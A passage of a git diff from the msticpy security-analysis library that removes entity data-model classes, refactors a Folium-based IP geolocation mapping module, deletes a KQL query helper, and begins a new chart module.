-
-
-@export
-class RegistryHive(Enum):
-    """RegistryHive enumeration."""
-
-    # <summary>HKEY_LOCAL_MACHINE</summary>
-    HKEY_LOCAL_MACHINE = 0
-    # <summary>HKEY_CLASSES_ROOT</summary>
-    HKEY_CLASSES_ROOT = 1
-    # <summary>HKEY_CURRENT_CONFIG</summary>
-    HKEY_CURRENT_CONFIG = 2
-    # <summary>HKEY_USERS</summary>
-    HKEY_USERS = 3
-    # <summary>HKEY_CURRENT_USER_LOCAL_SETTINGS</summary>
-    HKEY_CURRENT_USER_LOCAL_SETTINGS = 4
-    # <summary>HKEY_PERFORMANCE_DATA</summary>
-    HKEY_PERFORMANCE_DATA = 5
-    # <summary>HKEY_PERFORMANCE_NLSTEXT</summary>
-    HKEY_PERFORMANCE_NLSTEXT = 6
-    # <summary>HKEY_PERFORMANCE_TEXT</summary>
-    HKEY_PERFORMANCE_TEXT = 7
-    # <summary>HKEY_A</summary>
-    HKEY_A = 8
-    # <summary>HKEY_CURRENT_USER</summary>
-    HKEY_CURRENT_USER = 9
-
-
-@export
-class RegistryKey(Entity):
-    """RegistryKey Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.Hive}\\{self.Key}'
-
-    _entity_schema = {
-        # Hive (type System.Nullable`1
-        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.RegistryHive])
-        'Hive': 'RegistryHive',
-        # Key (type System.String)
-        'Key': None
-    }
-
-
-class RegistryValue(Entity):
-    """RegistryValue Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    @property
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.Name}[{self.ValueType}]:{repr(self.Value)}'
-
-    _entity_schema = {
-        # Key (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.RegistryKey)
-        'Key': None,
-        # Name (type System.String)
-        'Name': None,
-        # Value (type System.String)
-        'Value': None,
-        # ValueType (type System.Nullable`1[Microsoft.Win32.RegistryValueKind])
-        'ValueType': None
-    }
-
-
-@export
-class OSFamily(Enum):
-    """OSFamily enumeration."""
-
-    Linux = 0
-    Windows = 1
-
-
-@export
-class ElevationToken(Enum):
-    """ElevationToken enumeration."""
-
-    Default = 0
-    Full = 1
-    Limited = 2
-
-
-@export
-class AzureResource(Entity):
-    """AzureResource Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return self.ResourceId
-
-    _entity_schema = {
-        # ResourceId (type System.String)
-        'ResourceId': None,
-        # SubscriptionId (type System.String)
-        'SubscriptionId': None,
-        # ResourceIdParts (type System.Collections.Generic.IReadOnlyDictionary`2
-        # [System.String,System.String])
-        'ResourceIdParts': None
-    }
-
-
-@export
-class Alert(Entity):
-    """Alert Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.DisplayName} ({self.StartTimeUtc}) {self.CompromisedEntity}'
-
-    _entity_schema = {
-        # DisplayName (type System.String)
-        'DisplayName': None,
-        # CompromisedEntity (type System.String)
-        'CompromisedEntity': None,
-        # Count (type System.Nullable`1[System.Int32])
-        'Count': None,
-        # StartTimeUtc (type System.Nullable`1[System.DateTime])
-        'StartTimeUtc': None,
-        # EndTimeUtc (type System.Nullable`1[System.DateTime])
-        'EndTimeUtc': None,
-        # Severity (type System.Nullable`1
-        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Severity])
-        'Severity': None,
-        # SystemAlertIds (type System.Collections.Generic.List`1[System.String])
-        'SystemAlertIds': None,
-        # AlertType (type System.String)
-        'AlertType': None,
-        # VendorName (type System.String)
-        'VendorName': None,
-        # ProviderName (type System.String)
-        'ProviderName': None
-    }
-
-
-@export
-class Threatintelligence(Entity):
-    """Threatintelligence Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return f'{self.DisplayName} ({self.StartTimeUtc}) {self.CompromisedEntity}'
-
-    _entity_schema = {
-        # String Name of the provider from whom this Threat Intelligence information was received
-        'ProviderName': None,
-
-        'ThreatType': None,
-        'ThreatName': None,
-        'Confidence': None,
-        'ReportLink': None,
-        'ThreatDescription': None,
-    }
-
-@export
-class UnknownEntity(Entity):
-    """Generic Entity class."""
-
-    def __init__(self, src_entity=None, **kwargs):
-        """
-        Create a new instance of the entity type.
-
-            :param src_entity: instantiate entity using properties of src entity
-            :param kwargs: key-value pair representation of entity
-        """
-        super().__init__(src_entity=src_entity, **kwargs)
-
-    def description_str(self) -> str:
-        """Return Entity Description."""
-        return 'OtherEntity'
-
-    _entity_schema = {}
-
-# # test code
-# if __name__ == '__main__':
-#     import json
-#     import os
-#     print('hello')
-
-#     file = './python/tests/entities.json'
-#     if not os.path.exists(file):
-#         print('Test file {} not found'.format(file))
-#         exit()
-
-#     with open(file, 'r') as fh:
-#         txt = fh.read()
-#         entity_dict = json.loads(txt)
-#         parsed_entities = []
-#         for _, entity in entity_dict.items():
-#             e = Entity.instantiate_entity(entity)
-#             assert(isinstance(e, Entity))
-
-#             if e['Type'] == 'account':
-#                 assert(isinstance(e, Account))
-#                 assert('Name' in e)
-#                 assert(len(e.Name) > 0)
-#             elif e['Type'] == 'host':
-#                 assert(isinstance(e, Host))
-#                 assert('HostName' in e)
-#                 assert(len(e.HostName) > 0)
-#             elif e['Type'] == 'process':
-#                 assert(isinstance(e, Process))
-#                 assert('ProcessId' in e)
-#                 assert(len(e.ProcessId) > 0)
-#             elif e['Type'] == 'file':
-#                 assert(isinstance(e, File))
-#                 assert('Name' in e)
-#                 assert(len(e.Name) > 0)
-#             elif e['Type'] == 'ipaddress':
-#                 assert(isinstance(e, IpAddress))
-#                 assert('Address' in e)
-#                 assert(len(e.Address) > 0)
-
-#             parsed_entities.append(e)
+__author__ = "Ian Hellen"
 
-#         assert(len(parsed_entities) >= 7)
+# pylint: disable=wildcard-import, unused-wildcard-import
+from ..datamodel.entities import *  # noqa: F403, F401
diff --git a/msticpy/nbtools/foliummap.py b/msticpy/nbtools/foliummap.py
index 4e76ebf83..a699f0db9 100644
--- a/msticpy/nbtools/foliummap.py
+++ b/msticpy/nbtools/foliummap.py
@@ -4,75 +4,665 @@
 # license information.
 # --------------------------------------------------------------------------
 """Folium map class."""
-from collections.abc import Iterable
-from numbers import Number
+import math
+import statistics as stats
 import warnings
+from typing import Iterable, List, Tuple
 
 import folium
+from folium.plugins import MarkerCluster, FeatureGroupSubGroup
+import pygeohash
 
-# pylint: enable=locally-disabled, W0611
-from . utility import export
-from .. _version import VERSION
+from .._version import VERSION
+from ..datamodel.entities import Entity, GeoLocation, IpAddress
+
+# pylint: enable=locally-disabled, unused-import
+from ..common.utility import export
 
 __version__ = VERSION
-__author__ = 'Ian Hellen'
+__author__ = "Ian Hellen"
 
 
+# pylint: disable=too-many-arguments, too-few-public-methods
 @export
-class FoliumMap(object):
+class FoliumMap:
     """Wrapper class for Folium/Leaflet mapping."""
 
-    def __init__(self, title: str = 'layer1', zoom_start: int = 7, tiles=None,
-                 width: str = '100%', height: str = '100%'):
+    def __init__(
+        self,
+        title: str = "layer1",
+        zoom_start: float = 2.5,
+        tiles=None,
+        width: str = "100%",
+        height: str = "100%",
+        location: list = None,
+    ):
         """
         Create an instance of the folium map.
 
-        Keyword Arguments:
-            title {str} -- Name of the layer (default: {'layer1'})
-            zoom_start {int} -- The zoom level of the map (default: {7})
-            tiles {[type]} -- Custom set of tiles or tile URL (default: {None})
-            width {str} -- Map display width (default: {'100%'})
-            height {str} -- Map display height (default: {'100%'})
+        Parameters
+        ----------
+        title : str, optional
+            Name of the layer (the default is 'layer1')
+        zoom_start : int, optional
+            The zoom level of the map (the default is 7)
+        tiles : [type], optional
+            Custom set of tiles or tile URL (the default is None)
+        width : str, optional
+            Map display width (the default is '100%')
+        height : str, optional
+            Map display height (the default is '100%')
+        location : list, optional
+            Location to center map on
+
+        Attributes
+        ----------
+        folium_map : folium.Map
+            The map object.
 
         """
+        if not location:
+            location = [47.67, -122.13]
+
         self.folium_map = folium.Map(
-            zoom_start=zoom_start, tiles=tiles, width=width, height=height)
-        self.folium_map.add_tile_layer(name=title)
+            zoom_start=zoom_start,
+            tiles=tiles,
+            width=width,
+            height=height,
+            location=location,
+        )
+        folium.TileLayer(name=title).add_to(self.folium_map)
+        self.locations: List[Tuple[float, float]] = []
+
+    def _repr_html_(self):
+        """Return folium map as HTML."""
+        # pylint: disable=protected-access
+        return self.folium_map._repr_html_()
+        # pylint: enable=protected-access
+
+    def center_map(self):
+        """Calculate and set map center based on current coordinates."""
+        self.folium_map.location = _get_center_coords(self.locations)
 
-    def add_ip_cluster(self, ip_entities: Iterable, **kwargs):
+    def add_ip_cluster(self, ip_entities: Iterable[IpAddress], **kwargs):
         """
         Add a collection of IP Entities to the map.
 
-        Arguments:
-            ip_entities {Iterable} -- a list of IpAddress Entities
+        Parameters
+        ----------
+        ip_entities : Iterable[IpAddress]
+            a iterable of IpAddress Entities
 
-        Keyword Arguments:
+        Other Parameters
+        ----------------
             kwargs: icon properties to use for displaying this cluster
 
         """
+        geo_entity = GeoLocation()
+        geo_entity.CountryCode = "Unknown"
+        geo_entity.CountryName = "Unknown"
+        geo_entity.State = "Unknown"
+        geo_entity.City = "Unknown"
+        geo_entity.Longitude = 0.0  # type: ignore
+        geo_entity.Latitude = 0.0  # type: ignore
+
+        for ip_entity in ip_entities:
+            if ip_entity.Location is None:
+                ip_entity.Location = geo_entity
+
         for ip_entity in ip_entities:
-            if not (isinstance(ip_entity.Location.Latitude, Number) and
-                    isinstance(ip_entity.Location.Longitude, Number)):
-                warnings.warn("Invalid location information for IP: " + ip_entity.Address,
-                              RuntimeWarning)
+            if ip_entity.Location is None:
+                continue
+            if (
+                not (
+                    isinstance(ip_entity.Location.Latitude, (int, float))
+                    and isinstance(ip_entity.Location.Longitude, (int, float))
+                )
+                or math.isnan(ip_entity.Location.Latitude)
+                or math.isnan(ip_entity.Location.Longitude)
+            ):
+                warnings.warn(
+                    "Invalid location information for IP: " + ip_entity.Address,
+                    RuntimeWarning,
+                )
                 continue
-            loc_props = ', '.join([f'{key}={val}' for key, val in
-                                   ip_entity.Location.properties.items() if val])
-            popup_text = "{loc_props}<br>{IP}".format(IP=ip_entity.Address,
-                                                      loc_props=loc_props)
-            tooltip_text = '{City}, {CountryName}'.format(
-                **ip_entity.Location.properties)
+            loc_props = ", ".join(
+                f"{key}={val}"
+                for key, val in ip_entity.Location.properties.items()
+                if val
+            )
+
+            popup_text = f"{loc_props}<br>IP: {ip_entity.Address}"
+            if (
+                "City" in ip_entity.Location.properties
+                or "CountryName" in ip_entity.Location.properties
+            ):
+                tooltip_text = (
+                    f"{ip_entity.Location.City}, {ip_entity.Location.CountryName}"
+                )
+            else:
+                tooltip_text = (
+                    f"{ip_entity.Location.Latitude}, {ip_entity.Location.Longitude}"
+                )
 
             if ip_entity.AdditionalData:
-                addl_props = ', '.join([f'{key}={val}' for key, val in
-                                        ip_entity.AdditionalData.items() if val])
-                popup_text = f'{popup_text}<br>{addl_props}'
-                tooltip_text = f'{tooltip_text}, {addl_props}'
+                addl_props = ", ".join(
+                    f"{key}={val}"
+                    for key, val in ip_entity.AdditionalData.items()
+                    if val
+                )
+
+                popup_text = f"{popup_text}<br>{addl_props}"
+                tooltip_text = f"{tooltip_text}, {addl_props}"
             marker = folium.Marker(
-                location=[ip_entity.Location.Latitude,
-                          ip_entity.Location.Longitude],
+                location=[ip_entity.Location.Latitude, ip_entity.Location.Longitude],
                 popup=popup_text,
                 tooltip=tooltip_text,
-                icon=folium.Icon(**kwargs)
+                icon=folium.Icon(**kwargs),
             )
             marker.add_to(self.folium_map)
+            self.locations.append(
+                (ip_entity.Location.Latitude, ip_entity.Location.Longitude)
+            )
+
+    def add_geoloc_cluster(self, geo_locations: Iterable[GeoLocation], **kwargs):
+        """
+        Add a collection of GeoLocation objects to the map.
+
+        Parameters
+        ----------
+        geo_locations : Iterable[GeoLocation]
+            Iterable of GeoLocation entities.
+
+        """
+        ip_entities = [IpAddress(Address="na", Location=geo) for geo in geo_locations]
+        self.add_ip_cluster(ip_entities=ip_entities, **kwargs)
+
+    def add_locations(self, locations: Iterable[Tuple[float, float]], **kwargs):
+        """
+        Add a collection of lat/long tuples to the map.
+
+        Parameters
+        ----------
+        locations : Iterable[Tuple[float, float]]
+            Iterable of location tuples.
+
+        """
+        geo_entities = [
+            GeoLocation(Latitude=lat, Longitude=long) for lat, long in locations
+        ]
+        self.add_geoloc_cluster(geo_locations=geo_entities, **kwargs)
+
+    def add_geo_hashes(self, geohashes: Iterable[str], **kwargs):
+        """
+        Add decoded geohashes to the map.
+
+        Parameters
+        ----------
+        geohashes : Iterable[str]
+            Iterable of geolocation hashes
+
+        """
+        geo_entities = []
+        for geohash in geohashes:
+            decoded_location = decode_geo_hash(geohash)
+            geo_entities.append(
+                GeoLocation(Latitude=decoded_location[0], Longitude=decoded_location[1])
+            )
+
+        self.add_geoloc_cluster(geo_locations=geo_entities, **kwargs)
+
+    def add_marker_clusters(self, clusters: Iterable[MarkerCluster]):
+        """
+        Add MarkerClusters and to the map.
+
+        Parameters
+        ----------
+        clusters: Iterable[MarkerCluster]
+            Iterable of MarkerClusters
+
+        """
+        for cluster in clusters:
+            self.folium_map.add_child(cluster)
+
+    def add_feature_sub_groups(self, subgroups: Iterable[FeatureGroupSubGroup]):
+        """
+        Add FeatureGroupSubGroups and to the map.
+
+        Parameters
+        ----------
+        subgroups: Iterable[FeatureGroupSubGroup]
+            Iterable of FeatureGroupSubGroups
+
+        """
+        for subgroup in subgroups:
+            self.folium_map.add_child(subgroup)
+
+    def save_map(self, path: str):
+        """
+        Save the map to `path`.
+
+        Parameters
+        ----------
+        path: str
+            File path to save the current map
+
+        """
+        self.folium_map.save(path)
+
+    def add_locations_to_feature_subgroup(
+        self,
+        locations: Iterable[Tuple[float, float]],
+        subgroup: FeatureGroupSubGroup,
+        **kwargs,
+    ):
+        """
+        Create markers from locations and add the FeatureGroupSubGroup.
+
+        Parameters
+        ----------
+        locations: Iterable[Tuple[float, float]]
+            Collection of Latitude/Longitude coordinates to be added
+            to the FeatureGroupSubGroup
+        subgroup: FeatureGroupSubGroup
+            Subgroup to add locations to, then add to the map
+
+        """
+        for point in locations:
+            marker = self.create_marker(location=point, **kwargs)
+            marker.add_to(subgroup)
+            self.locations.append(point)
+
+        subgroups = [subgroup]
+
+        self.add_feature_sub_groups(subgroups)
+
+    def add_locations_to_marker_cluster(
+        self, locations: Iterable[Tuple[float, float]], cluster: MarkerCluster, **kwargs
+    ):
+        """
+        Create markers from locations and add to MarkerCluster.
+
+        Parameters
+        ----------
+        locations: Iterable[Tuple[float, float]]
+            Collection of Latitude/Longitude coordinates to be added
+            to the MarkerCluster
+        cluster: MarkerCluster
+            Marker cluster to add locations to, then add to the map
+
+        """
+        for point in locations:
+            marker = self.create_marker(location=point, **kwargs)
+            marker.add_to(cluster)
+            self.locations.append(point)
+
+        clusters = [cluster]
+
+        self.add_marker_clusters(clusters)
+
+    def create_new_cluster_with_locations(
+        self, locations: Iterable[Tuple[float, float]], name: str, **kwargs
+    ):
+        """
+        Create a MarkerCluster with locations.
+
+        Parameters
+        ----------
+        locations: Iterable[Tuple[float, float]]
+            Collection of Latitude/Longitude coordinates to be added to the
+            MarkerCluster
+        name: str
+            Name of Marker Cluster to create, add locations to,
+            then add to the map
+
+        """
+        marker_cluster = MarkerCluster(name=name)
+
+        self.add_locations_to_marker_cluster(
+            locations=locations, cluster=marker_cluster, **kwargs
+        )
+
+    def create_new_subgroup_with_locations(
+        self,
+        locations: Iterable[Tuple[float, float]],
+        subgroup_name: str,
+        cluster_name: str,
+        **kwargs,
+    ):
+        """
+        Create subgroup of markers from locations.
+
+        Parameters
+        ----------
+        locations: Iterable[Tuple[float, float]]
+            Collection of Latitude/Longitude coordinates to be added
+            to the FeatureGroupSubGroup
+        subgroup_name: str
+            Name of FeatureGroupSubGroup to create, add locations to,
+            then add to the map
+        cluster_name : str
+            Name of the cluster
+
+        Notes
+        -----
+        This function creates a marker cluster and FeatureGroupSubGroup,
+        then add the locations to the subgroup, then add the subgroup to the map.
+
+        """
+        marker_cluster = MarkerCluster(name=cluster_name)
+        feature_subgroup = FeatureGroupSubGroup(marker_cluster, name=subgroup_name)
+
+        self.add_locations_to_feature_subgroup(
+            locations=locations, subgroup=feature_subgroup, **kwargs
+        )
+
+    def enable_layer_control(self):
+        """
+        Enable Layer Control on the map.
+
+        Parameters
+        ----------
+        None
+
+        """
+        folium.LayerControl().add_to(self.folium_map)
+
+    def create_new_cluster_with_geohashes(
+        self, geohashes: Iterable[str], name: str, **kwargs
+    ):
+        """
+        Create a MarkerCluster and add geohash locations.
+
+        Parameters
+        ----------
+        geohashes: Iterable[str]
+            Collection of geohashes to be decoded and added to the MarkerCluster
+        name: str
+            Name of Marker Cluster to create, add locations to, then add to the map
+
+        """
+        locations = decode_geohash_collection(geohashes)
+        self.create_new_cluster_with_locations(locations=locations, name=name, **kwargs)
+
+    def create_new_subgroup_with_geohashes(
+        self, geohashes: Iterable[str], subgroup_name: str, cluster_name: str, **kwargs
+    ):
+        """
+        Create a FeatureSubGroup with collection of geohash locations.
+
+        Parameters
+        ----------
+        geohashes: Iterable[str]
+            Collection of geohashes to be decoded and added to
+            the FeatureGroupSubGroup
+        subgroup_name: str
+            Name of SubGroup to create, add locations to, then add to the map
+        cluster_name: str
+            Name of the Marker Cluster to create and add the SubGroup to
+
+        """
+        locations = decode_geohash_collection(geohashes)
+
+        self.create_new_subgroup_with_locations(
+            locations=locations,
+            subgroup_name=subgroup_name,
+            cluster_name=cluster_name,
+            **kwargs,
+        )
+
+    @staticmethod
+    def create_marker(
+        location: Tuple[float, float],
+        tooltip: str = None,
+        popup: str = None,
+        **kwargs,
+    ) -> folium.Marker:
+        """
+        Create and return a Folium Marker at a given location.
+
+        Parameters
+        ----------
+        location: Tuple[float,float]
+            Latitude/Longitude coordinates for the Marker
+        tooltip: str [Optional]
+            Tooltip text for the Marker
+        popup: str [Optional]
+            Popup text for the Marker
+
+        Returns
+        -------
+        Marker
+            A Folium Marker at the given location coordinates
+
+        """
+        return folium.Marker(
+            location=location, tooltip=tooltip, popup=popup, icon=folium.Icon(**kwargs)
+        )
+
+    @staticmethod
+    def create_marker_cluster(name: str):
+        """
+        Create and return a MarkerCluster with name.
+
+        Parameters
+        ----------
+        name: str
+            Name of the MarkerCluster
+
+        Returns
+        -------
+        MarkerCluster
+            A Folium MarkerCluster with the provided name
+
+        """
+        return MarkerCluster(name=name)
+
+    @staticmethod
+    def create_feature_sub_group_of_marker_cluster(
+        cluster: MarkerCluster, name: str
+    ) -> FeatureGroupSubGroup:
+        """
+        Return a FeatureGroupSubGroup with `name` for a MarkerCluster.
+
+        Parameters
+        ----------
+        cluster: MarkerCluster
+            Folium MarkerCluster to add FeatureGroupSubGroup to
+        name: str
+            Desired name of the MarkerCluster
+
+        Returns
+        -------
+        FeatureGroupSubGroup
+            A Folium FeatureGroupSubGroup with the provided name as part
+            of the given MarkerCluster
+
+        """
+        return FeatureGroupSubGroup(cluster, name=name)
+
+
+def decode_geo_hash(geohash: str) -> Tuple[float, float, float, float]:
+    """
+    Decode a geohash.
+
+    Parameters
+    ----------
+    geohash: str
+        A string representation of a location
+
+    Returns
+    -------
+    Tuple
+        Tuple representation of a geohash, format of:
+        (Latitude, Longitude,
+        Latitude Error interval, Longitude Error Interval)
+
+    """
+    return pygeohash.decode_exactly(geohash)
+
+
+def decode_geohash_collection(geohashes: Iterable[str]):
+    """
+    Return collection of geohashes decoded into location coordinates.
+
+    Parameters
+    ----------
+    geohashes: Iterable[str]
+        Collection of geohashes to be decoded
+
+    Returns
+    -------
+    Iterable[Tuple[float, float]]
+        Collection of location coordinates in Latitude/Longitude
+
+    """
+    locations = []
+
+    for geohash in geohashes:
+        exact_location = decode_geo_hash(geohash)
+        locations.append((exact_location[0], exact_location[1]))
+
+    return locations
+
+
+def get_map_center(entities: Iterable[Entity], mode: str = "modal"):
+    """
+    Calculate median point between Entity IP locations.
+
+    Parameters
+    ----------
+    entities : Iterable[Entity]
+        An iterable of entities containing IpAddress geolocation information.
+        The entities can be IpAddress entities or other entities that
+        have IpAddress properties.
+        The entities must all be of the same type.
+    mode : str, optional
+        The averaging method to use, by default "median".
+        "median" and "mean" are the supported values.
+
+    Returns
+    -------
+    Tuple
+        The Latitude and Longitude calculated
+
+    Notes
+    -----
+    The function uses the first entity in the `entities` to determine
+    how to process the collection. E.g. if the first entity has properties
+    src_ip and dest_ip of type `IpAddress`, these are the only properties
+    that will be processed for the remainder of the entities.
+
+    """
+    ip_entities: List[IpAddress] = []
+    loc_entities: List[GeoLocation] = []
+    if not entities:
+        return (0, 0)
+    entities = list(entities)
+    if isinstance(entities[0], IpAddress):
+        return get_center_ip_entities(entities)  # type: ignore
+    loc_props = [
+        p_name
+        for p_name, p_val in entities[0].properties.items()
+        if isinstance(p_val, (IpAddress, GeoLocation))
+    ]
+    for entity in entities:
+        for prop in loc_props:
+            if prop not in entity:
+                continue
+            loc_entity = entity[prop]
+            if isinstance(loc_entity, IpAddress):
+                ip_entities.append(loc_entity)
+            elif isinstance(loc_entity, GeoLocation):
+                loc_entities.append(loc_entity)
+    locs_ips = _extract_locs_ip_entities(ip_entities)
+    return get_center_geo_locs(locs_ips + loc_entities, mode=mode)
+
+
+def _extract_locs_ip_entities(ip_entities: Iterable[IpAddress]):
+    """Return the list of IP entities that have a Location property."""
+    if isinstance(ip_entities[0], list):  # type: ignore
+        return [
+            ip[0]["Location"]  # type: ignore
+            for ip in ip_entities
+            if bool(ip[0].Location)  # type: ignore
+        ]
+    return [ip["Location"] for ip in ip_entities if bool(ip.Location)]
+
+
+def get_center_ip_entities(
+    ip_entities: Iterable[IpAddress], mode: str = "median"
+) -> Tuple[float, float]:
+    """
+    Return the geographical center of the IP address locations.
+
+    Parameters
+    ----------
+    ip_entities : Iterable[IpAddress]
+        IpAddress entities with location information
+    mode : str, optional
+        The averaging method to us, by default "median".
+        "median" and "mean" are the supported values.
+
+    Returns
+    -------
+    Tuple[Union[int, float], Union[int, float]]
+        Tuple of latitude, longitude
+
+    """
+    ip_locs_longs = _extract_locs_ip_entities(ip_entities)
+    return get_center_geo_locs(ip_locs_longs, mode=mode)
+
+
+def _extract_coords_loc_entities(loc_entities: Iterable[GeoLocation]):
+    """Return list of coordinate tuples from GeoLocation entities."""
+    return [
+        (loc["Latitude"], loc["Longitude"])
+        for loc in loc_entities
+        if "Latitude" in loc and "Longitude" in loc
+    ]
+
+
+def get_center_geo_locs(
+    loc_entities: Iterable[GeoLocation], mode: str = "median"
+) -> Tuple[float, float]:
+    """
+    Return the geographical center of the geo locations.
+
+    Parameters
+    ----------
+    loc_entities : Iterable[GeoLocation]
+        GeoLocation entities with location information
+    mode : str, optional
+        The averaging method to use, by default "median".
+        "median" and "mean" are the supported values.
+
+    Returns
+    -------
+    Tuple[Union[int, float], Union[int, float]]
+        Tuple of latitude, longitude
+
+    """
+    lat_longs = _extract_coords_loc_entities(loc_entities)
+    return _get_center_coords(lat_longs, mode=mode)
+
+
+def _get_center_coords(
+    locations: Iterable[Tuple[float, float]], mode: str = "median"
+) -> Tuple[float, float]:
+    """Return the center (median) of the coordinates."""
+    if not locations:
+        return 0, 0
+    locs = list(locations)
+    if mode == "median":
+        try:
+            return (
+                stats.median([loc[0] for loc in locs if not math.isnan(loc[0])]),
+                stats.median([loc[1] for loc in locs if not math.isnan(loc[1])]),
+            )
+        except stats.StatisticsError:
+            pass
+    return (
+        stats.mean([loc[0] for loc in locs if not math.isnan(loc[0])]),
+        stats.mean([loc[1] for loc in locs if not math.isnan(loc[1])]),
+    )
diff --git a/msticpy/nbtools/kql.py b/msticpy/nbtools/kql.py
deleted file mode 100644
index 65e6b748c..000000000
--- a/msticpy/nbtools/kql.py
+++ /dev/null
@@ -1,151 +0,0 @@
-# -------------------------------------------------------------------------
-# Copyright (c) Microsoft Corporation. All rights reserved.
-# Licensed under the MIT License. See License.txt in the project root for
-# license information.
-# --------------------------------------------------------------------------
-"""KQL Helper functions."""
-import sys
-from functools import partial
-
-import pandas as pd
-from IPython import get_ipython
-from Kqlmagic import results
-
-from . query_builtin_queries import query_definitions
-# pylint: disable=locally-disabled, W0611
-# (list_queries not used here but want to bring in into module namespace)
-from . query_mgr import (replace_prov_query_params, list_queries,
-                         clean_kql_query, query_help, print_kql)
-# pylint: enable=locally-disabled, W0611
-from . utility import export
-from .. _version import VERSION
-
-__version__ = VERSION
-__author__ = 'Ian Hellen'
-
-# pylint: disable=locally-disabled, C0103
-_kql_magic_loaded = False
-_ip = get_ipython()
-# pylint: enable=locally-disabled, C0103
-
-
-@export
-def load_kql_magic():
-    """Load KqlMagic if not loaded."""
-    # KqlMagic
-    if not _is_kqlmagic_loaded():
-        print('Please wait. Loading Kqlmagic extension...')
-        get_ipython().run_line_magic('reload_ext', 'Kqlmagic')
-        # get_ipython().run_line_magic('config', 'Kqlmagic.auto_dataframe=True')
-        if not _is_kqlmagic_loaded():
-            raise EnvironmentError('Kqlmagic did not load correctly.')
-
-
-def _is_kqlmagic_loaded() -> bool:
-    """Return true if kql magic is loaded."""
-    # pylint: disable=locally-disabled, C0103, W0603
-    global _kql_magic_loaded
-    # pylint: enable=locally-disabled, C0103, W0603
-
-    if _ip is not None:
-        _kql_magic_loaded = _ip.find_magic('kql') is not None
-        return _kql_magic_loaded
-
-
-@export
-def exec_query(query_name: str, **kwargs) -> (pd.DataFrame, results.ResultSet):
-    """
-    Execute kql query with optional parameters and return a Dataframe.
-
-    Use list_queries() to see the current set).
-    Use query_help(query_name) to view the query and expected paramaters
-    Arguments:
-        query_name {string}: the name of query to run
-        kwargs: additional replacable paramters for the query
-            {string:bool} kql_result=True - return (DataFrame, KqlResultSet)
-                    tuple.
-                    kql_result=False - return DataFrame only (default)
-            {string:[QueryParamProvider]} - for the key 'provs'
-                (or alias 'providers')
-                this should be a collection of objects that
-                implement QueryParamProvider (from which query
-                parameters can be extracted).
-                OR
-            {string:value pairs} -- custom parameter list
-                (override default values and values extracted
-                from QueryParamProviders).
-    Returns:
-        dataframe {pd.DataFrame}: if kql_result == False (default).
-        (dataframe, ResultSet): tuple of dataframe and Kql ResultSet
-            if kql_result==True (pass this as a kw argument).
-
-    """
-    if 'kql_result' in kwargs:
-        kql_result = kwargs.pop('kql_result')
-    else:
-        kql_result = False
-
-    replaced_query = replace_prov_query_params(query_name=query_name, **kwargs)
-    replaced_query = clean_kql_query(replaced_query)
-    if replaced_query:
-        result = _ip.run_cell_magic('kql', line='', cell=replaced_query)
-        if result is not None and result.completion_query_info['StatusCode'] == 0:
-            data_frame = result.to_dataframe()
-            if result.is_partial_table:
-                print("Warning - query returned partial results.")
-            # Did user want both dataframe and ResultSet
-            if not kql_result:
-                return data_frame
-            else:
-                return data_frame, result
-
-        print("Warning - query did not complete successfully.")
-        print("Kql ResultSet returned - check  \'completion_query_info\' property.")
-        return result
-
-
-@export
-def show_filled_query(query_name: str, **kwargs) -> (pd.DataFrame, results.ResultSet):
-    """
-    Print the kql query with replaced parameter values.
-
-    Use list_queries() to see the current set).
-    Use query_help(query_name) to view the query and expected paramaters
-    Arguments:
-        query_name {string}: the name of query to run
-        kwargs: additional replacable paramters for the query
-            {string:bool} kql_result=True - return (DataFrame, KqlResultSet)
-                    tuple.
-                    kql_result=False - return DataFrame only (default)
-            {string:[QueryParamProvider]} - for the key 'provs'
-                (or alias 'providers')
-                this should be a collection of objects that
-                implement QueryParamProvider (from which query
-                parameters can be extracted).
-                OR
-            {string:value pairs} -- custom parameter list
-                (override default values and values extracted
-                from QueryParamProviders).
-    Returns:
-        replaced_query {str}: the query with substituted parameters.
-
-    """
-    replaced_query = replace_prov_query_params(query_name=query_name, **kwargs)
-    print_kql(replaced_query)
-    return replaced_query
-
-
-def _add_queries_to_module(module_name):
-    """Add queries to the module as callable methods."""
-    if module_name not in sys.modules:
-        raise LookupError(f'Module {module_name} was not found sys.modules')
-    for query_name in query_definitions:
-        module = sys.modules[module_name]
-        query_func = partial(exec_query, query_name=query_name)
-        query_func.__doc__ = exec_query.__doc__
-        setattr(module, query_name, query_func)
-
-
-# Add all queries defined in builtin queries module as functions
-if __name__ != '__main__':
-    _add_queries_to_module(__name__)
diff --git a/msticpy/nbtools/morph_charts.py b/msticpy/nbtools/morph_charts.py
new file mode 100644
index 000000000..35c508f43
--- /dev/null
+++ b/msticpy/nbtools/morph_charts.py
@@ -0,0 +1,159 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
